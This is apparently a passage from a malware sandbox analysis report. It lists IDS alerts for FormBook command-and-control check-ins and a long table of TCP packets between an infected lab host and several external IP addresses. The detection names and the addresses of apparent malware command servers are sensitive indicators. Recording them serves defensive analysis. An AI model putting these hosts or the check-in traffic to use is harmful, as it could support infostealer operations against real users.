                                                      2024-09-11T11:21:00.793822+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46337638.181.141.12280TCP
                                                      2024-09-11T11:21:10.103459+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.46337781.88.63.4680TCP
                                                      2024-09-11T11:21:10.103459+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.46337781.88.63.4680TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 11, 2024 11:17:24.456057072 CEST4973680192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:17:24.467027903 CEST804973681.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:17:24.467154980 CEST4973680192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:17:24.474478006 CEST4973680192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:17:24.479285955 CEST804973681.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:17:25.129198074 CEST804973681.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:17:25.129210949 CEST804973681.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:17:25.129348993 CEST4973680192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:17:25.132328987 CEST4973680192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:17:25.137223959 CEST804973681.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:17:40.206856966 CEST6331780192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:40.211844921 CEST8063317217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:40.211930037 CEST6331780192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:40.222723007 CEST6331780192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:40.227763891 CEST8063317217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:40.860830069 CEST8063317217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:40.860852957 CEST8063317217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:40.860929012 CEST6331780192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:40.860934973 CEST8063317217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:40.861013889 CEST6331780192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:41.731251001 CEST6331780192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:42.755686998 CEST6331880192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:43.421040058 CEST8063318217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:43.421181917 CEST6331880192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:43.430991888 CEST6331880192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:43.436101913 CEST8063318217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:44.027640104 CEST8063318217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:44.027697086 CEST8063318217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:44.027832985 CEST6331880192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:44.934312105 CEST6331880192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:45.957532883 CEST6331980192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:45.962534904 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.962699890 CEST6331980192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:45.975841045 CEST6331980192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:45.980866909 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.980942965 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.980972052 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.980999947 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.981026888 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.981079102 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.981106043 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.981159925 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:45.981188059 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:46.566657066 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:46.566706896 CEST8063319217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:46.566840887 CEST6331980192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:47.481226921 CEST6331980192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:48.501033068 CEST6332080192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:48.509215117 CEST8063320217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:48.509366989 CEST6332080192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:48.519026041 CEST6332080192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:48.524990082 CEST8063320217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:49.105931997 CEST8063320217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:49.105952024 CEST8063320217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:49.105966091 CEST8063320217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:49.106205940 CEST6332080192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:49.110240936 CEST6332080192.168.2.4217.70.184.50
                                                      Sep 11, 2024 11:17:49.115226984 CEST8063320217.70.184.50192.168.2.4
                                                      Sep 11, 2024 11:17:54.654225111 CEST6332180192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:54.659187078 CEST8063321172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:54.659290075 CEST6332180192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:54.669792891 CEST6332180192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:54.675076008 CEST8063321172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:55.140651941 CEST8063321172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:55.140686035 CEST8063321172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:55.140961885 CEST6332180192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:56.184351921 CEST6332180192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:57.208417892 CEST6332280192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:57.213310003 CEST8063322172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:57.213392019 CEST6332280192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:57.228420019 CEST6332280192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:57.234143972 CEST8063322172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:57.660542965 CEST8063322172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:57.660615921 CEST8063322172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:57.660794973 CEST6332280192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:58.731468916 CEST6332280192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:59.749600887 CEST6332380192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:59.758765936 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.758852959 CEST6332380192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:59.768162012 CEST6332380192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:17:59.777004957 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.777066946 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.777096033 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.777141094 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.777172089 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.781611919 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.781640053 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.781699896 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:17:59.781728029 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:00.220200062 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:00.220246077 CEST8063323172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:00.220299006 CEST6332380192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:01.278832912 CEST6332380192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.296561003 CEST6332480192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.301757097 CEST8063324172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:02.301877022 CEST6332480192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.308949947 CEST6332480192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.314166069 CEST8063324172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:02.762028933 CEST8063324172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:02.763535976 CEST8063324172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:02.763624907 CEST6332480192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.764791965 CEST6332480192.168.2.4172.96.187.60
                                                      Sep 11, 2024 11:18:02.769670963 CEST8063324172.96.187.60192.168.2.4
                                                      Sep 11, 2024 11:18:07.798162937 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:07.803044081 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:07.803194046 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:07.814496994 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:07.819418907 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:08.258095980 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:08.258289099 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:09.325052977 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:09.330508947 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:10.343126059 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:10.349684000 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:10.349802017 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:10.359231949 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:10.365390062 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:11.092897892 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:11.092972994 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:11.093970060 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:11.094031096 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:11.872617960 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.036500931 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.890500069 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.895430088 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.895559072 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.906126022 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.911036968 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911061049 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911071062 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911122084 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911132097 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911237955 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911267042 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911324978 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911334991 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:13.362245083 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:13.362343073 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:14.418711901 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:14.423676968 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.440284014 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.445321083 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.445422888 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.461708069 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.468009949 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.905046940 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.905201912 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.905253887 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.908864021 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.913628101 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:21.098649025 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:21.103533030 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:21.103676081 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:21.117927074 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:21.123251915 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311043978 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311181068 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311203957 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311219931 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311234951 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311249018 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311264038 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311279058 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311294079 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311309099 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311325073 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311407089 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.311407089 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.311407089 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.311614990 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311729908 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.317779064 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317794085 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317809105 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317823887 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317841053 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317854881 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317859888 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.317872047 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317888975 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317919016 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.318089008 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.318609953 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318684101 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318700075 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318828106 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318845034 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318860054 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.319152117 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319168091 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319183111 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319195986 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319219112 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.321676016 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.624394894 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.641534090 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.647141933 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:23.650656939 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.663914919 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.672373056 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239707947 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239788055 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239837885 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239885092 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239922047 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.239928007 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239962101 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239969969 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.239984035 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.240005016 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.240026951 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.240034103 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.240137100 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.240151882 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.241981030 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.246325016 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.246347904 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.246362925 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.246423006 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.247021914 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.247103930 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.327253103 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327265978 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327275991 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327286959 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327505112 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.332431078 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332443953 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332456112 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332472086 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332483053 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.332775116 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.337217093 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337229013 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337239027 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337249994 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337260008 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337275028 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.337379932 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.342062950 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.342075109 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.342083931 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.342200994 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:25.168761969 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.187666893 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.193666935 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.194283009 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.204415083 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.210875034 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210890055 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210902929 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210916996 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210932016 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211457968 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211472034 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211487055 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211499929 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797095060 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797116041 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797132969 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797148943 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797159910 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.797164917 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797189951 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.797220945 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797333956 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.798088074 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798104048 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798120022 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798144102 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.798264027 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798302889 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.802201986 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802217960 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802233934 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802262068 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.802567005 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802608013 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.885519981 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885536909 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885591984 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.885664940 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885679007 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885694981 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885723114 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.885827065 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885842085 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885867119 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.886379957 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.886394024 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.886418104 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.886543036 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.886589050 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.886642933 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887195110 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887209892 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887224913 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887238979 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.887239933 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887286901 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.887777090 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887824059 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.887914896 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887958050 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:27.715734959 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.734641075 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.739615917 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:28.739701033 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.747967958 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.753993034 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.321966887 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322052956 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322088003 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322119951 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322185040 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322218895 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322259903 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322294950 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322326899 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322350025 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322401047 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322433949 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322457075 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322508097 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322554111 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.327617884 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327642918 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327661991 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327680111 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327712059 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.327897072 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.409023046 CEST806333267.223.117.189192.168.2.4
